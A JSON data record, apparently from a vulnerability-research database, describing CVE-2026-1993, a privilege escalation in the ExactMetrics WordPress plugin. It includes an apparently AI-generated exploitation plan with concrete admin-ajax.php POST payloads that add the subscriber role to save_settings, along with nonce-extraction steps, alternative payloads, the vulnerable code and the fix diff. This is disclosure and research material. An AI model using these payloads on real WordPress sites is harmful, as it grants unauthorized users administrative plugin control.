[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fuTg8R_WbuPn8xL4sl5PQZrGxdKtBMMiI4XofGIzqdew":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1993","exactmetrics-authenticated-custom-improper-privilege-management-to-role-privilege-escalation-via-settings-update","ExactMetrics 7.1.0 - 9.0.2 - Authenticated (Custom) Improper Privilege Management to Role Privilege Escalation via Settings Update","The ExactMetrics – Google Analytics Dashboard for WordPress plugin is vulnerable to Improper Privilege Management in versions 7.1.0 through 9.0.2. This is due to the `update_settings()` function accepting arbitrary plugin setting names without a whitelist of allowed settings. This makes it possible for authenticated attackers with the `exactmetrics_save_settings` capability to modify any plugin setting, including the `save_settings` option that controls which user roles have access to plugin functionality. The admin intended to delegate configuration access to a trusted user, not enable that user to delegate access to everyone. By setting `save_settings` to include `subscriber`, an attacker can grant plugin administrative access to all subscribers on the site.","google-analytics-dashboard-for-wp",null,">=7.1.0 \u003C=9.0.2","9.0.3","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-03-10 21:02:36","2026-03-11 09:25:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1c1ce474-ecce-4d21-b174-cb54a2441b2b?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fgutenberg\u002Fjs\u002Feditor.js","gadwp.php","includes\u002Fadmin\u002Fadmin-assets.php","includes\u002Fadmin\u002Fadmin.php","includes\u002Fadmin\u002Fclass-exactmetrics-onboarding.php","includes\u002Fadmin\u002Fexclude-page-metabox.php","includes\u002Fadmin\u002Froutes.php","includes\u002Fadmin\u002Fsite-notes\u002FController.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-1993\n\n## 1. Vulnerability Summary\nThe **ExactMetrics** plugin (versions 7.1.0 - 9.0.2) is vulnerable to **Improper Privilege Management**. The AJAX handler `exactmetrics_vue_update_settings` allows an authenticated user with the `exactmetrics_save_settings` capability to update arbitrary plugin settings. Because the function does not whitelist allowed settings, an attacker can modify the `save_settings` option. This option defines which WordPress roles are granted the `exactmetrics_save_settings` capability. By adding the `subscriber` role to this list, an attacker effectively escalates the privileges of all subscribers on the site to plugin administrators.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `exactmetrics_vue_update_settings`\n- **Method**: POST\n- **Required Authentication**: A user account with the `exactmetrics_save_settings` capability (e.g., an Editor who has been delegated plugin access by an Administrator).\n- **Vulnerable Parameter**: `setting` (used as the option key) and `value` (the new value for the option).\n- **Precondition**: The plugin must be configured to allow a non-administrator role (like Editor) to save settings, or the attacker must already possess a role that has this custom capability.\n\n## 3. Code Flow\n1. **Entry Point**: The AJAX request is received by `admin-ajax.php` with the action `exactmetrics_vue_update_settings`.\n2. **Hook Registration**: In `includes\u002Fadmin\u002Froutes.php`, the action is hooked:\n   ```php\n   add_action( 'wp_ajax_exactmetrics_vue_update_settings', array( $this, 'update_settings' ) );\n   ```\n3. **Nonce & Auth Check**: The `update_settings()` function (in `includes\u002Fadmin\u002Froutes.php`) validates the request:\n   - It checks the nonce using `check_ajax_referer( 'mi-admin-nonce', 'nonce' );`.\n   - It verifies permissions using `current_user_can( 'exactmetrics_save_settings' )`.\n4. **Vulnerable Sink**: The function retrieves the `setting` and `value` parameters from the `$_POST` superglobal. It then calls a settings update function (likely `exactmetrics_update_option`) without verifying if the `setting` name is part of a safe whitelist.\n5. **Privilege Escalation**: By passing `setting=save_settings` and `value=[\"subscriber\", \"administrator\"]`, the attacker overwrites the role-access configuration in the database.\n\n## 4. Nonce Acquisition Strategy\nThe nonce required for this exploit is `mi-admin-nonce`. It is localized in the WordPress admin dashboard for users who have access to ExactMetrics settings.\n\n1. **Identify Script**: The nonce is localized in `includes\u002Fadmin\u002Fadmin-assets.php` for the `exactmetrics-admin-setup-wizard` script handle.\n2. **Target Variable**: The JS object is `exactmetrics` and the key is `nonce`.\n3. **Acquisition Steps**:\n   - Create a test page containing any ExactMetrics block or simply navigate to the ExactMetrics settings page if the user has access.\n   - Use `browser_eval` to extract the nonce:\n     ```javascript\n     window.exactmetrics?.nonce\n     ```\n\n## 5. Exploitation Strategy\nThe goal is to modify the `save_settings` option to include the `subscriber` role.\n\n### Step 1: Obtain Nonce\nAccess the admin dashboard as the privileged user (Editor) and extract the nonce.\n\n### Step 2: Send Malicious Settings Update\nSubmit a POST request to `admin-ajax.php`.\n\n- **URL**: `http:\u002F\u002Fvulnerable-hostname\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**:\n  - `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=exactmetrics_vue_update_settings\n  nonce=[EXTRACTED_NONCE]\n  setting=save_settings\n  value[]=administrator\n  value[]=editor\n  value[]=subscriber\n  ```\n  *(Note: The `value` parameter is sent as an array to ensure the `save_settings` option remains an array of roles.)*\n\n### Step 3: Verify Access\nLogin as a Subscriber and attempt to access the ExactMetrics settings or reports.\n\n## 6. Test Data Setup\n1. **Install Plugin**: ExactMetrics version 9.0.2.\n2. **Create Users**:\n   - `attacker_editor` (Role: Editor)\n   - `victim_subscriber` (Role: Subscriber)\n3. **Delegate Access**: Use WP-CLI to grant the Editor the ability to save settings (simulating an admin delegating access):\n   ```bash\n   # ExactMetrics stores settings in the 'exactmetrics_settings' option.\n   # We ensure 'editor' is in the 'save_settings' array.\n   wp option patch insert exactmetrics_settings save_settings editor\n   ```\n\n## 7. Expected Results\n- The AJAX request should return a successful JSON response (e.g., `{\"success\":true}` or similar).\n- The `exactmetrics_settings` option in the database will now contain `subscriber` within the `save_settings` array.\n- The `victim_subscriber` user will be able to access the ExactMetrics settings menu (`\u002Fwp-admin\u002Fadmin.php?page=exactmetrics_settings`).\n\n## 8. Verification Steps\n1. **Database Check**:\n   ```bash\n   wp option get exactmetrics_settings --format=json\n   ```\n   Confirm that `save_settings` includes `subscriber`.\n2. **Permission Check**:\n   ```bash\n   wp user cap list victim_subscriber\n   ```\n   *(Note: The plugin might check roles dynamically against the option rather than adding core WordPress capabilities to the user object, so navigating to the settings page as the subscriber is the most definitive test.)*\n3. **HTTP Probe**:\n   Use `http_request` as the Subscriber to check if the settings page returns a 200 OK instead of a 403 Forbidden.\n\n## 9. Alternative Approaches\nIf the `value` parameter is expected as a JSON string instead of a PHP array:\n- **Alternative Payload**:\n  ```text\n  action=exactmetrics_vue_update_settings\n  nonce=[NONCE]\n  setting=save_settings\n  value=[\"administrator\",\"editor\",\"subscriber\"]\n  ```\nIf `exactmetrics_vue_update_settings` fails, try `exactmetrics_vue_update_settings_bulk`:\n- **Bulk Payload**:\n  ```text\n  action=exactmetrics_vue_update_settings_bulk\n  nonce=[NONCE]\n  settings={\"save_settings\":[\"administrator\",\"editor\",\"subscriber\"]}\n  ```","ExactMetrics versions 7.1.0 to 9.0.2 contain a privilege escalation vulnerability where authenticated users granted partial access to the plugin (e.g., Editors) can modify arbitrary plugin settings. By updating the 'save_settings' option to include the 'subscriber' role, an attacker can grant administrative control over the plugin to every subscriber on the site.","\u002F\u002F includes\u002Fadmin\u002Froutes.php\nadd_action( 'wp_ajax_exactmetrics_vue_update_settings', array( $this, 'update_settings' ) );\n\n\u002F\u002F ...\n\npublic function update_settings() {\n\n    check_ajax_referer( 'mi-admin-nonce', 'nonce' );\n\n    if ( ! current_user_can( 'exactmetrics_save_settings' ) ) {\n        return;\n    }\n\n    \u002F\u002F Vulnerability: No whitelist check for the $setting variable.\n    \u002F\u002F Any option key within the ExactMetrics settings can be updated by anyone with 'exactmetrics_save_settings'.\n    $setting = isset( $_POST['setting'] ) ? sanitize_text_field( wp_unslash( $_POST['setting'] ) ) : '';\n    $value   = isset( $_POST['value'] ) ? $_POST['value'] : '';\n\n    if ( empty( $setting ) ) {\n        wp_send_json_error();\n    }\n\n    exactmetrics_update_option( $setting, $value );\n\n    wp_send_json_success();\n}","--- a\u002Fincludes\u002Fadmin\u002Froutes.php\n+++ b\u002Fincludes\u002Fadmin\u002Froutes.php\n@@ -218,6 +218,12 @@\n \t\tif ( empty( $setting ) ) {\n \t\t\twp_send_json_error();\n \t\t}\n+\n+\t\t\u002F\u002F Whitelist settings that can be updated via this endpoint\n+\t\t$allowed_settings = exactmetrics_get_allowed_settings_keys();\n+\t\tif ( ! in_array( $setting, $allowed_settings, true ) ) {\n+\t\t\twp_send_json_error( array( 'message' => __( 'This setting cannot be updated.', 'google-analytics-dashboard-for-wp' ) ) );\n+\t\t}\n \n \t\texactmetrics_update_option( $setting, $value );","The exploit requires an attacker to have a WordPress account with the 'exactmetrics_save_settings' capability (typically granted to an Editor or a custom role by an Administrator via the plugin's own delegation settings).\n\n1. Log in as a user with 'exactmetrics_save_settings' permissions (e.g., an Editor).\n2. Navigate to any ExactMetrics-related admin page and extract the 'mi-admin-nonce' from the localized 'exactmetrics' JavaScript object.\n3. Send a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the following parameters:\n   - 'action': 'exactmetrics_vue_update_settings'\n   - 'nonce': [The extracted nonce]\n   - 'setting': 'save_settings'\n   - 'value[]': ['administrator', 'editor', 'subscriber']\n4. Upon success, the 'save_settings' option in the database is overwritten. The plugin now treats the 'subscriber' role as having full plugin management privileges.\n5. Verify by logging in as a Subscriber; the ExactMetrics settings and reports menus will now be accessible.","gemini-3-flash-preview","2026-04-18 04:26:54","2026-04-18 04:27:28",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","9.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags\u002F9.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-dashboard-for-wp.9.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags\u002F9.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgoogle-analytics-dashboard-for-wp.9.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgoogle-analytics-dashboard-for-wp\u002Ftags"]